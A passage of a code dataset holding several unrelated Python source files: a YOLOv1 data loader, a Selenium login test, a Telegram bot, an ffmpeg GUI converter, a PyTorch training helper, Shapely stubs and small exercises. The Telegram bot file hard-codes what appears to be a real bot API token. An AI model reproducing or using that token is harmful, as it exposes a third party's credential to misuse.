classes\r\n self.mean = (123, 117, 104) # RGB\r\n file_txt = open(list_file)\r\n lines = file_txt.readlines() # read every line of the txt file\r\n for line in lines: # process the file line by line\r\n splited = line.strip().split() # strip the surrounding whitespace and split into a list\r\n self.fnames.append(splited[0]) # store the image name\r\n num_boxes = (len(splited) - 1) // 5 # number of bboxes in this image\r\n box = []\r\n label = []\r\n for i in range(num_boxes): # corner coordinates of each bbox\r\n x = float(splited[1 + 5 * i])\r\n y = float(splited[2 + 5 * i])\r\n x2 = float(splited[3 + 5 * i])\r\n y2 = float(splited[4 + 5 * i])\r\n c = splited[5 + 5 * i] # the object class, i.e. which of the 20 categories, range 0-19\r\n box.append([x, y, x2, y2])\r\n label.append(int(c))\r\n self.boxes.append(torch.Tensor(box))\r\n self.labels.append(torch.LongTensor(label))\r\n self.num_samples = len(self.boxes)\r\n\r\n def __getitem__(self, idx):\r\n fname = self.fnames[idx]\r\n img = cv2.imread(os.path.join(self.root + fname))\r\n boxes = self.boxes[idx].clone()\r\n labels = self.labels[idx].clone()\r\n if self.train: # torchvision transforms cannot be used for these augmentations: rotating or randomly cropping the image also changes the bbox coordinates, so the augmentations are implemented by hand\r\n img, boxes = self.random_flip(img, boxes)\r\n img, boxes = self.randomScale(img, boxes)\r\n img = self.randomBlur(img)\r\n img = self.RandomBrightness(img)\r\n # img = self.RandomHue(img)\r\n # img = self.RandomSaturation(img)\r\n img, boxes, labels = self.randomShift(img, boxes, labels)\r\n # img, boxes, labels = self.randomCrop(img, boxes, labels)\r\n h, w, _ = img.shape\r\n boxes /= torch.Tensor([w, h, w, h]).expand_as(boxes) # normalize the coordinates to make training easier\r\n img = self.BGR2RGB(img) # because pytorch pretrained model use RGB\r\n img = self.subMean(img, self.mean) # subtract the mean\r\n img = cv2.resize(img, (self.image_size, self.image_size)) # resize every image to the target size\r\n target = self.encoder(boxes, labels) # encode the labels into a 7x7x30 tensor\r\n\r\n for t in self.transform:\r\n img = t(img)\r\n\r\n return img, target\r\n\r\n def __len__(self):\r\n return self.num_samples\r\n\r\n # def letterbox_image(self, image, size):\r\n # # resize the image without distortion and pad the empty area\r\n # iw, ih = image.size\r\n # scale = min(size / iw, size / ih)\r\n # nw = int(iw * scale)\r\n # nh = int(ih * scale)\r\n #\r\n # image = image.resize((nw, nh), 
Image.BICUBIC)\r\n # new_image = Image.new('RGB', size, (128, 128, 128))\r\n # new_image.paste(image, ((size - nw) // 2, (size - nh) // 2))\r\n # return new_image\r\n\r\n def encoder(self, boxes, labels): # boxes come in as normalized (x1,y1,x2,y2); the output is the 7x7 ground-truth grid\r\n grid_num = 7\r\n target = torch.zeros((grid_num, grid_num, int(CLASS_NUM + 10))) # 7*7*30\r\n cell_size = 1. / grid_num # 1/7\r\n wh = boxes[:, 2:] - boxes[:, :2] # wh = [w, h] 1*1\r\n\r\n # the object center coordinates\r\n cxcy = (boxes[:, 2:] + boxes[:, :2]) / 2 # normalized fractional center coordinates\r\n for i in range(cxcy.size()[0]):\r\n cxcy_sample = cxcy[i] # center coordinate 1*1\r\n ij = (cxcy_sample / cell_size).ceil() - 1 # integer top-left cell index on the 7*7 grid\r\n # confidence of the first box\r\n target[int(ij[1]), int(ij[0]), 4] = 1\r\n # confidence of the second box\r\n target[int(ij[1]), int(ij[0]), 9] = 1\r\n\r\n target[int(ij[1]), int(ij[0]), int(labels[i]) + 10] = 1 # set the probability of the matching class (out of the 20) to 1\r\n\r\n xy = ij * cell_size # normalized top-left corner of the cell (1*1)\r\n\r\n delta_xy = (cxcy_sample - xy) / cell_size # offset of the center from the cell's top-left corner (7*7)\r\n\r\n # w,h store the predicted bounding box width/height as a fraction of the whole image's width/height\r\n target[int(ij[1]), int(ij[0]), 2:4] = wh[i] # w1,h1\r\n target[int(ij[1]), int(ij[0]), :2] = delta_xy # x1,y1\r\n\r\n # each grid cell carries two boxes\r\n target[int(ij[1]), int(ij[0]), 7:9] = wh[i] # w2,h2\r\n # note the stored center is really an offset from the cell's top-left corner, so predictions must be decoded accordingly\r\n target[int(ij[1]), int(ij[0]), 5:7] = delta_xy # [5,7) holds x2,y2\r\n return target # (xc,yc) = 7*7 (w,h) = 1*1\r\n\r\n # the methods below are all data augmentation operations\r\n\r\n def BGR2RGB(self, img):\r\n return cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n\r\n def BGR2HSV(self, img):\r\n return cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n\r\n def HSV2BGR(self, img):\r\n return cv2.cvtColor(img, cv2.COLOR_HSV2BGR)\r\n\r\n def RandomBrightness(self, bgr):\r\n if random.random() < 0.5:\r\n hsv = self.BGR2HSV(bgr)\r\n h, s, v = cv2.split(hsv)\r\n adjust = random.choice([0.5, 1.5])\r\n v = v * adjust\r\n v = np.clip(v, 0, 255).astype(hsv.dtype)\r\n hsv = cv2.merge((h, s, v))\r\n bgr = self.HSV2BGR(hsv)\r\n return bgr\r\n\r\n def RandomSaturation(self, bgr):\r\n if random.random() < 0.5:\r\n hsv = self.BGR2HSV(bgr)\r\n h, s, v = cv2.split(hsv)\r\n adjust = random.choice([0.5, 1.5])\r\n s = s * adjust\r\n s = np.clip(s, 0, 255).astype(hsv.dtype)\r\n hsv = cv2.merge((h, s, v))\r\n bgr = self.HSV2BGR(hsv)\r\n return bgr\r\n\r\n def RandomHue(self, bgr):\r\n if random.random() < 0.5:\r\n hsv = self.BGR2HSV(bgr)\r\n h, s, v = cv2.split(hsv)\r\n adjust = random.choice([0.5, 1.5])\r\n h = h * adjust\r\n h = np.clip(h, 0, 255).astype(hsv.dtype)\r\n hsv = cv2.merge((h, s, v))\r\n bgr = self.HSV2BGR(hsv)\r\n return bgr\r\n\r\n def randomBlur(self, bgr):\r\n if random.random() < 0.5:\r\n bgr = cv2.blur(bgr, (5, 5))\r\n return bgr\r\n\r\n def randomShift(self, bgr, boxes, labels):\r\n # random translation\r\n center = (boxes[:, 2:] + boxes[:, :2]) / 2\r\n if random.random() < 0.5:\r\n height, width, c = bgr.shape\r\n after_shift_image = np.zeros((height, width, c), dtype=bgr.dtype)\r\n after_shift_image[:, :, :] = (104, 117, 123) # bgr\r\n shift_x = random.uniform(-width * 0.2, width * 0.2)\r\n shift_y = random.uniform(-height * 0.2, height * 0.2)\r\n # print(bgr.shape,shift_x,shift_y)\r\n # translate the original image\r\n if shift_x >= 0 and shift_y >= 0:\r\n after_shift_image[int(shift_y):,\r\n int(shift_x):,\r\n :] = bgr[:height - int(shift_y),\r\n :width - int(shift_x),\r\n :]\r\n elif shift_x >= 0 and shift_y < 0:\r\n after_shift_image[:height + int(shift_y),\r\n int(shift_x):,\r\n :] = bgr[-int(shift_y):,\r\n :width - int(shift_x),\r\n :]\r\n elif shift_x < 0 and shift_y >= 0:\r\n after_shift_image[int(shift_y):, :width +\r\n 
int(shift_x), :] = bgr[:height -\r\n int(shift_y), -\r\n int(shift_x):, :]\r\n elif shift_x < 0 and shift_y < 0:\r\n after_shift_image[:height + int(shift_y), :width + int(\r\n shift_x), :] = bgr[-int(shift_y):, -int(shift_x):, :]\r\n\r\n shift_xy = torch.FloatTensor(\r\n [[int(shift_x), int(shift_y)]]).expand_as(center)\r\n center = center + shift_xy\r\n mask1 = (center[:, 0] > 0) & (center[:, 0] < width)\r\n mask2 = (center[:, 1] > 0) & (center[:, 1] < height)\r\n mask = (mask1 & mask2).view(-1, 1)\r\n boxes_in = boxes[mask.expand_as(boxes)].view(-1, 4)\r\n if len(boxes_in) == 0:\r\n return bgr, boxes, labels\r\n box_shift = torch.FloatTensor(\r\n [[int(shift_x), int(shift_y), int(shift_x), int(shift_y)]]).expand_as(boxes_in)\r\n boxes_in = boxes_in + box_shift\r\n labels_in = labels[mask.view(-1)]\r\n return after_shift_image, boxes_in, labels_in\r\n return bgr, boxes, labels\r\n\r\n def randomScale(self, bgr, boxes):\r\n # keep the height fixed and stretch the width by a factor of 0.8-1.2 to deform the image\r\n if random.random() < 0.5:\r\n scale = random.uniform(0.8, 1.2)\r\n height, width, c = bgr.shape\r\n bgr = cv2.resize(bgr, (int(width * scale), height))\r\n scale_tensor = torch.FloatTensor(\r\n [[scale, 1, scale, 1]]).expand_as(boxes)\r\n boxes = boxes * scale_tensor\r\n return bgr, boxes\r\n return bgr, boxes\r\n\r\n def randomCrop(self, bgr, boxes, labels):\r\n if random.random() < 0.5:\r\n center = (boxes[:, 2:] + boxes[:, :2]) / 2\r\n height, width, c = bgr.shape\r\n h = random.uniform(0.6 * height, height)\r\n w = random.uniform(0.6 * width, width)\r\n x = random.uniform(0, width - w)\r\n y = random.uniform(0, height - h)\r\n x, y, h, w = int(x), int(y), int(h), int(w)\r\n\r\n center = center - torch.FloatTensor([[x, y]]).expand_as(center)\r\n mask1 = (center[:, 0] > 0) & (center[:, 0] < w)\r\n mask2 = (center[:, 1] > 0) & (center[:, 1] < h)\r\n mask = (mask1 & mask2).view(-1, 1)\r\n\r\n boxes_in = boxes[mask.expand_as(boxes)].view(-1, 4)\r\n if (len(boxes_in) == 0):\r\n return bgr, boxes, labels\r\n box_shift = torch.FloatTensor([[x, y, x, y]]).expand_as(boxes_in)\r\n\r\n boxes_in = boxes_in - box_shift\r\n boxes_in[:, 0] = boxes_in[:, 0].clamp_(min=0, max=w)\r\n boxes_in[:, 2] = boxes_in[:, 2].clamp_(min=0, max=w)\r\n boxes_in[:, 1] = boxes_in[:, 1].clamp_(min=0, max=h)\r\n boxes_in[:, 3] = boxes_in[:, 3].clamp_(min=0, max=h)\r\n\r\n labels_in = labels[mask.view(-1)]\r\n img_cropped = bgr[y:y + h, x:x + w, :]\r\n return img_cropped, boxes_in, labels_in\r\n return bgr, boxes, labels\r\n\r\n def subMean(self, bgr, mean):\r\n mean = np.array(mean, dtype=np.float32)\r\n bgr = bgr - mean\r\n return bgr\r\n\r\n def random_flip(self, im, boxes):\r\n if random.random() < 0.5:\r\n im_lr = np.fliplr(im).copy()\r\n h, w, _ = im.shape\r\n xmin = w - boxes[:, 2]\r\n xmax = w - boxes[:, 0]\r\n boxes[:, 0] = xmin\r\n boxes[:, 2] = xmax\r\n return im_lr, boxes\r\n return im, boxes\r\n\r\n def random_bright(self, im, delta=16):\r\n alpha = random.random()\r\n if alpha > 0.3:\r\n im = im * alpha + random.randrange(-delta, delta)\r\n im = im.clip(min=0, max=255).astype(np.uint8)\r\n return im\r\n\r\n\r\n# def main():\r\n# file_root = 'VOCdevkit/VOC2007/JPEGImages/'\r\n# train_dataset = yoloDataset(\r\n# img_root=file_root,\r\n# list_file='voctrain.txt',\r\n# train=True,\r\n# transform=[\r\n# ToTensor()])\r\n# train_loader = DataLoader(\r\n# train_dataset,\r\n# batch_size=2,\r\n# drop_last=True,\r\n# shuffle=False,\r\n# num_workers=0)\r\n# train_iter = iter(train_loader)\r\n# for i in range(100):\r\n# img, target = next(train_iter)\r\n# 
print(img.shape)\r\n#\r\n#\r\n# if __name__ == '__main__':\r\n# main()\r\n","repo_name":"inging550/YOLOV1-pytorch","sub_path":"yoloData.py","file_name":"yoloData.py","file_ext":"py","file_size_in_byte":12900,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"60"} {"seq_id":"9179301057","text":"'''\r\nRECURSIVE EXCEPTIONS\r\n'''\r\n\r\n\r\ndef rec_exceptions(l):\r\n \r\n errors = []\r\n for f in l:\r\n try:\r\n l2 = f()\r\n except Exception as x:\r\n errors.append(x)\r\n else:\r\n errors += rec_exceptions(l2)\r\n return errors\r\n\r\n\r\n\r\nprint(rec_exceptions([lambda: [lambda: [1,2,3].index(-1), lambda:\r\n''[2]], lambda: [1,2,3][4], lambda: [lambda: [lambda: 1/0]]]))\r\n \r\n \r\n ","repo_name":"ivSaav/Programming-Fundamentals","sub_path":"RE13/rec_exceptions.py","file_name":"rec_exceptions.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} {"seq_id":"24915997422","text":"import unittest\nfrom pages.login_page import LoginPage\nfrom selenium import webdriver\nfrom common.base import Base\nimport ddt\nfrom common.read_excel import ReadExcel\nimport os\n\nurl = \"http://120.77.156.30:8080/zentao/user-login.html\"\n'''\ncase1: wrong username, correct password, click login\ncase2: wrong password, correct username, click login\ncase3: username only, no password, click login\ncase4: no username and no password, click login\ncase5: correct username and password, click login\n'''\n'''testdatas = [\n {\"user\":\"admui\",\"pwd\":\"123456.\",\"expect\":\"result\"},\n {\"user\":\"admin\",\"pwd\":\"123456\",\"expect\":\"result\"},\n {\"user\":\"admin\",\"pwd\":\"\",\"expect\":\"result\"},\n {\"user\":\"\",\"pwd\":\"\",\"expect\":\"result\"},\n {\"user\":\"admin\",\"pwd\":\"123456.\",\"expect\":\"result\"}\n ]'''\n# the path must not be hard-coded, or other callers would not find the file; use the os module to walk up the directory tree and locate it\npropath = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nfilepath = os.path.join(propath,\"common\",\"datas.xlsx\") # join the project path with common/datas.xlsx\nprint(filepath)\ndata = ReadExcel(filepath)\ntestdatas = data.dict_data()\nprint(testdatas)\n\n@ddt.ddt\nclass LoginTestCase(unittest.TestCase,Base):\n\n @classmethod\n def setUpClass(cls):\n cls.driver = webdriver.Firefox()\n cls.login_c = LoginPage(cls.driver)\n cls.driver.get(url)\n\n def setUp(self):\n self.driver.get(url)\n self.is_alert_present()\n self.driver.delete_all_cookies()\n self.driver.refresh()\n\n def login_case(self,user,pwd,expect):\n self.login_c.input_user(user)\n self.login_c.input_pwd(pwd)\n self.login_c.click_login_button()\n result = self.login_c.get_login_name()\n self.assertTrue(result != expect)\n\n @ddt.data(*testdatas)\n def test_case(self,data):\n print(\"--------------start----------------\")\n print(\"test data: %s\"%data)\n self.login_case(data[\"user\"],data[\"pwd\"],data[\"expect\"])\n print(\"————————end————————\")\n '''\n def test_case_02(self):\n print(\"--------------start----------------\")\n testdatas2 = testdatas[1]\n self.login_case(testdatas2[\"user\"],testdatas2[\"pwd\"],testdatas2[\"expect\"])\n print(\"————————end————————\")\n\n def test_case_03(self):\n print(\"--------------start----------------\")\n testdatas3 = testdatas[2]\n self.login_case(testdatas3[\"user\"],testdatas3[\"pwd\"],testdatas3[\"expect\"])\n print(\"————————end————————\")\n\n def test_case_04(self):\n print(\"--------------start----------------\")\n testdatas4 = testdatas[3]\n self.login_case(testdatas4[\"user\"],testdatas4[\"pwd\"],testdatas4[\"expect\"])\n print(\"————————end————————\")\n def test_case_05(self):\n 
print(\"--------------start----------------\")\n testdatas5 = testdatas[4]\n self.login_case(testdatas5[\"user\"],testdatas5[\"pwd\"],testdatas5[\"expect\"])\n print(\"————————end————————\")\n '''\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\nif __name__ ==\"__main__\":\n unittest.main()","repo_name":"xuenihongzhua/selenium-python","sub_path":"case/test_login_ddt.py","file_name":"test_login_ddt.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2619445468","text":"import subprocess\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom tkinter import ttk\n\n\nclass Main(tk.Tk):\n def __init__(self):\n super().__init__()\n self.title(\"Tai's Media Converter\")\n self.geometry(\"500x150\")\n self.protocol(\"WM_DELETE_WINDOW\", self.on_close)\n\n self.input_file_path = tk.StringVar()\n self.output_file_path = tk.StringVar()\n\n main_frame = ttk.Frame(self)\n main_frame.pack(fill=\"both\", padx=10, pady=10)\n\n input_frame = ttk.Frame(main_frame)\n input_frame.pack(fill=\"x\")\n input_label = ttk.Label(input_frame, text=\"Input File:\")\n input_label.pack(side=\"left\")\n input_entry = ttk.Entry(input_frame, textvariable=self.input_file_path, width=40)\n input_entry.pack(side=\"left\", expand=True)\n input_browse_button = ttk.Button(input_frame, text=\"Browse\", command=self.browse_input_file)\n input_browse_button.pack(side=\"left\")\n\n output_frame = ttk.Frame(main_frame)\n output_frame.pack(fill=\"x\")\n output_label = ttk.Label(output_frame, text=\"Output File:\")\n output_label.pack(side=\"left\")\n output_entry = ttk.Entry(output_frame, textvariable=self.output_file_path, width=40)\n output_entry.pack(side=\"left\", expand=True)\n output_browse_button = ttk.Button(output_frame, text=\"Browse\", command=self.browse_output_file)\n output_browse_button.pack(side=\"left\")\n\n convert_button = ttk.Button(main_frame, text=\"Convert\", command=self.convert_media)\n convert_button.pack(pady=10)\n\n self.progress_bar = ttk.Progressbar(main_frame, orient=\"horizontal\", length=300, mode=\"determinate\")\n self.progress_bar.pack()\n\n def browse_input_file(self):\n file_path = filedialog.askopenfilename(filetypes=[(\"Media Files\", \"*.media\")])\n if file_path:\n self.input_file_path.set(file_path)\n\n def browse_output_file(self):\n file_path = filedialog.asksaveasfilename(filetypes=[(\"MP4\", \"*.mp4\")], defaultextension=\".mp4\")\n if file_path:\n self.output_file_path.set(file_path)\n\n def convert_media(self):\n input_file = self.input_file_path.get()\n output_file = self.output_file_path.get()\n\n if not input_file or not output_file:\n messagebox.showerror(\"Error\", \"Please select input and output files.\")\n return\n\n try:\n command = [\"ffmpeg\", \"-i\", input_file, \"-c:v\", \"copy\", \"-c:a\", \"aac\", output_file]\n process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n while True:\n output = process.stdout.readline()\n if process.poll() is not None:\n break\n if output:\n print(output.strip().decode())\n\n exit_code = process.poll()\n if exit_code == 0:\n messagebox.showinfo(\"Conversion Complete\", \"Conversion complete!\")\n else:\n messagebox.showerror(\"Conversion Failed\", \"Conversion failed. 
Please check the input file and try again.\")\n except Exception as e:\n print(e)\n messagebox.showerror(\"Error\", \"An error occurred during conversion.\")\n\n def on_close(self):\n if messagebox.askokcancel(\"Quit\", \"Are you sure you want to quit?\"):\n self.destroy()\n\nif __name__ == \"__main__\":\n app = Main()\n app.mainloop()","repo_name":"dtphung/py-mediaFileConverter","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} {"seq_id":"31510836483","text":"# drawing 4\n#https://drive.google.com/drive/folders/1twa91wzrbuyFNY6k-oHg_Fe0BsTRQS2W \n# 2019, task 5\nimport turtle \nturtle.tracer(0, 1)\nilosc_kolumn = 17\nilosc_wierszy = 17\nszerokosc = 20\nfor i in range(ilosc_wierszy+1):\n turtle.penup()\n turtle.goto(-200, -200+szerokosc*i)\n turtle.pendown()\n for j in range(ilosc_kolumn):\n turtle.fd(szerokosc)\nturtle.lt(90)\nfor i in range(ilosc_kolumn+1):\n turtle.penup()\n turtle.goto(-200+szerokosc*i, -200)\n turtle.pendown()\n for j in range(ilosc_wierszy):\n turtle.fd(szerokosc)\nturtle.update()\ninput()\n\n","repo_name":"DominikSzczepaniak/University","sub_path":"Semestr1/Wstęp do programowania Python/lista13/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} {"seq_id":"8113746323","text":"from telegram.ext import (\n Updater, \n CommandHandler, \n MessageHandler,\n Filters\n)\n\n# create an Updater instance\nupdater = Updater(token=\"474302941:AAH-t-lDgmscYAME0-R3WEh9cOi2mcc1YVY\")\n\n# grab the Dispatcher instance\ndispatcher = updater.dispatcher\n\n# create the callbacks for the handlers\ndef start(bot, update):\n \"\"\"\n A callback that replies with a message\n at the start of a conversation.\n \"\"\"\n user_first_name = update.message.chat.first_name\n\n msg = \"Hi {}\".format(user_first_name)\n chat_id = update.message.chat_id\n\n bot.send_message(chat_id=chat_id, text=msg)\n\n\ndef bye(bot, update):\n\n user_first_name = update.message.chat.first_name\n msg = \"Bye {}, thanks for messaging me.\".format(user_first_name)\n chat_id = update.message.chat_id\n\n user_msg = update.message.text\n\n if user_msg.lower() == 'bye':\n bot.send_message(chat_id=chat_id, text=msg)\n\n\n# create one command handler and one message handler.\nstart_handler = CommandHandler('start', start)\nbye_handler = MessageHandler(Filters.text, bye)\n\n# register the handlers with the dispatcher\ndispatcher.add_handler(start_handler)\ndispatcher.add_handler(bye_handler)\n\n# start polling so the updater receives every message sent to the bot.\nupdater.start_polling()\n","repo_name":"AntLouiz/PUGexamplebot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} {"seq_id":"42897754277","text":"from typing_extensions import Literal\n\nfrom ._typing import _ArrayLikeFloat\nfrom .geometry.base import BaseGeometry\n\ndef affine_transform(geom: BaseGeometry, matrix: _ArrayLikeFloat): ...\ndef rotate(\n geom: BaseGeometry,\n angle: float,\n origin: Literal[\"center\", \"centroid\"] | _ArrayLikeFloat = ...,\n use_radians: bool = ...,\n): ...\ndef scale(\n geom: BaseGeometry,\n xfact: float = ...,\n yfact: float = ...,\n zfact: float = ...,\n origin: str = ...,\n): ...\ndef skew(\n geom: BaseGeometry,\n xs: float = ...,\n ys: 
float = ...,\n origin: str = ...,\n use_radians: bool = ...,\n): ...\ndef translate(\n geom: BaseGeometry, xoff: float = ..., yoff: float = ..., zoff: float = ...\n): ...\n","repo_name":"ciscorn/shapely-stubs","sub_path":"shapely-stubs/affinity.pyi","file_name":"affinity.pyi","file_ext":"pyi","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} {"seq_id":"69805447233","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader,TensorDataset\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom tqdm import tqdm\nimport time\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.metrics import accuracy_score, recall_score, precision_score\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn')\n\n\nclass nn_factory():\n \n def __init__(self, model, device, X_df, y_df, batch_size, model_save_path):\n \n self.model = model.to(device)\n self.device = device\n self.model_save_path = model_save_path\n self.threshold = 0.5\n \n # split validation set\n X_train, X_val, y_train, y_val = train_test_split(X_df, y_df, test_size=0.2, random_state=33)\n \n self.X_train_tensor = torch.from_numpy(np.array(X_train)).to(self.device)\n self.y_train_tensor = torch.from_numpy(np.array(y_train)).to(self.device)\n self.X_val_tensor = torch.from_numpy(np.array(X_val)).to(self.device)\n self.y_val_tensor = torch.from_numpy(np.array(y_val)).to(self.device)\n \n \n self.train_loader = DataLoader(TensorDataset(self.X_train_tensor, self.y_train_tensor), \n batch_size = batch_size, shuffle = True)\n \n self.val_loader = DataLoader(TensorDataset(self.X_val_tensor, self.y_val_tensor), \n batch_size = batch_size, shuffle = False)\n \n \n cat = list(set(y_train))\n nSamples = [sum(y_train==c) for c in cat]\n self.class_weights = [1 - (x / sum(nSamples)) for x in nSamples]\n \n\n def fit(self, epoch):\n # optimizer = optim.Adam(self.model.parameters())\n optimizer = optim.AdamW(self.model.parameters(), lr=0.0001)\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[20, 40], gamma=0.1)\n\n best_val_loss = 10000000\n best_val_acc = 0\n train_loss_hist, train_acc_hist, train_recall_hist, train_precision_hist = [], [], [], []\n val_loss_hist, val_acc_hist, val_recall_hist, val_precision_hist = [], [], [], []\n \n for ep in range(1, epoch + 1):\n epoch_begin = time.time()\n train_loss, train_acc, train_recall, train_precision = self.train(optimizer, ep)\n val_loss, val_acc, val_recall, val_precision = self.val()\n \n scheduler.step()\n print('elapsed: %.2fs \\n' % (time.time() - epoch_begin))\n \n if val_loss <= best_val_loss:\n print('validation loss improved, saving model...\\n')\n torch.save(self.model.state_dict(),\n os.path.join(self.model_save_path, 'epoch-%d-val_loss%.3f-val_acc%.3f.pt'\n % (ep, val_loss, val_acc)))\n \n best_val_loss = val_loss\n best_val_acc = val_acc\n \n train_loss_hist.append(train_loss)\n train_acc_hist.append(train_acc)\n train_recall_hist.append(train_recall)\n train_precision_hist.append(train_precision)\n val_loss_hist.append(val_loss)\n val_acc_hist.append(val_acc)\n val_recall_hist.append(val_recall)\n val_precision_hist.append(val_precision)\n\n # save the final model\n # fast, but the dimensions of each layer or the Net class must also be saved to restore it\n state = {\n 'epoch': epoch,\n 'state_dict': self.model.state_dict(),\n 'optimizer': optimizer.state_dict()\n }\n torch.save(state, 
os.path.join(self.model_save_path, 'last_model.pt'))\n \n ### graph train hist ###\n self.graph_hist(loss={'train':train_loss_hist, 'val': val_loss_hist}, \n acc={'train': train_acc_hist, 'val': val_acc_hist},\n recall={'train': train_recall_hist, 'val': val_recall_hist},\n precision={'train': train_precision_hist, 'val': val_precision_hist}\n )\n \n def predict_proba(self, df):\n \n #np_data = self.transformer.transform(df)\n tensor_data = torch.from_numpy(np.array(df)).to(self.device)\n\n with torch.no_grad():\n log_prob = F.log_softmax(self.model(tensor_data.float()), dim=1)\n pred_prob = torch.exp(log_prob).data.cpu().numpy()\n \n return pred_prob\n \n \n def predict(self, df):\n pred_prob = self.predict_proba(df)\n pred_ind = np.argmax(pred_prob, axis=1)\n \n return pred_ind\n \n \n def train(self, optimizer, epoch):\n \n device = self.device\n train_loader = self.train_loader\n \n print('[epoch %d]train on %d data......' % (epoch,len(train_loader.dataset)))\n train_loss = 0\n train_pred, train_target = [], []\n self.model.train()\n for batch_ind, (data, target) in enumerate(tqdm(train_loader)):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = self.model(data.float())\n \n weights = torch.tensor(self.class_weights).to(device)\n # criterion = FocalLoss(weight=weights)\n criterion = nn.CrossEntropyLoss(weight=weights)\n loss = criterion(output, target)\n \n train_loss += loss.item()\n loss.backward()\n optimizer.step()\n\n log_prob = F.log_softmax(output, dim=1)\n pred_prob = torch.exp(log_prob).data.cpu().numpy()[:, 1]\n train_pred.extend((pred_prob >= self.threshold).astype(int))\n train_target.extend(target.cpu().detach().numpy().tolist())\n \n train_loss /= len(train_loader.dataset)\n acc = accuracy_score(train_target, train_pred)\n recall = recall_score(train_target, train_pred)\n precision = precision_score(train_target, train_pred)\n \n print('training set: average loss:%.4f, acc:%.3f, recall: %.3f, precision: %.3f'\\\n %(train_loss, 100 * acc, recall, precision))\n \n return train_loss, acc, recall, precision\n \n \n def val(self):\n model = self.model\n device = self.device\n val_loader = self.val_loader\n \n print('validation on %d data......' 
% len(val_loader.dataset))\n model.eval()\n val_loss = 0\n val_pred, val_target = [], []\n with torch.no_grad(): # temporarily set all requires_grad flags to false\n for data,target in val_loader:\n data,target = data.to(device),target.to(device)\n output = model(data.float())\n \n weights = torch.tensor(self.class_weights).to(device)\n # criterion = FocalLoss(weight=weights)\n criterion = nn.CrossEntropyLoss(weight=weights)\n val_loss += criterion(output, target).item() # sum up batch loss\n \n log_prob = F.log_softmax(output, dim=1)\n val_prob = torch.exp(log_prob).data.cpu().numpy()[:, 1]\n val_pred.extend((val_prob > self.threshold).astype(int))\n val_target.extend(target.cpu().detach().numpy().tolist())\n \n val_loss /= len(val_loader.dataset) # average of the summed batch losses\n acc = accuracy_score(val_target, val_pred)\n recall = recall_score(val_target, val_pred)\n precision = precision_score(val_target, val_pred)\n \n print('Val set: average loss:%.4f, acc:%.3f, recall: %.3f, precision: %.3f'\\\n %(val_loss, 100 * acc, recall, precision))\n \n return val_loss, acc, recall, precision\n \n def graph_hist(self, **kwargs):\n i = 1\n plt.figure(figsize=(24, 6))\n for k1, v1 in kwargs.items():\n plt.subplot(1, len(kwargs), i)\n for k2, v2 in v1.items():\n plt.plot(v2)\n plt.legend(['train %s' % k1, 'val %s' % k1], loc='best')\n i += 1\n plt.savefig(os.path.join(self.model_save_path, 'train_hist.jpg'))\n plt.close()\n \n\n# kept here instead of loss.py so that boosting-only users don't need to install pytorch\nclass FocalLoss(nn.Module):\n def __init__(self, weight, gamma=2):\n super(FocalLoss, self).__init__()\n self.gamma = gamma\n self.weight = weight\n\n def forward(self, input, target):\n \"\"\"\n input: [N, C]\n target: [N, ]\n \"\"\"\n logpt = F.log_softmax(input, dim=1)\n pt = torch.exp(logpt)\n logpt = (1-pt)**self.gamma * logpt\n loss = F.nll_loss(logpt, target, self.weight)\n return loss\n \n","repo_name":"henry16lin/ML_Service","sub_path":"nn_factory.py","file_name":"nn_factory.py","file_ext":"py","file_size_in_byte":8777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} {"seq_id":"4058108580","text":"class Player(object):\n\n connexion = None\n\n def __init__(\n self,\n id=0,\n familly_name=None,\n first_name=None,\n age=None,\n gender=None,\n rank=None,\n point=0,\n ):\n self.id = id\n self.familly_name = familly_name\n self.first_name = first_name\n self.age = age\n self.gender = gender\n self.rank = rank\n self.point = point\n\n # All tournaments the player is registered in\n self.tournaments = {}\n","repo_name":"Call-X/P04_Chessmat","sub_path":"Models/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} {"seq_id":"1443955818","text":"import time\nimport sys\nfrom itertools import cycle\nimport hashlib\nimport base64\n\n\nclass Metodo:\n\n def encrypt(self, n, plaintext, key):\n result = ''\n for x in plaintext.lower():\n try:\n i = (key.index(x) + n) % 26\n result += key[i]\n except ValueError:\n result += x\n return result.lower()\n\n def decrypt(self, n, ciphertext, key):\n result = ''\n for y in ciphertext.lower():\n try:\n i = (key.index(y) - n) % 26\n result += key[i]\n except ValueError:\n result += y\n return result.lower()\n\n def cadena(self, cadena):\n cadena_invertida = \"\"\n for letra in cadena:\n cadena_invertida = letra + cadena_invertida\n return cadena_invertida\n\n\nclass 
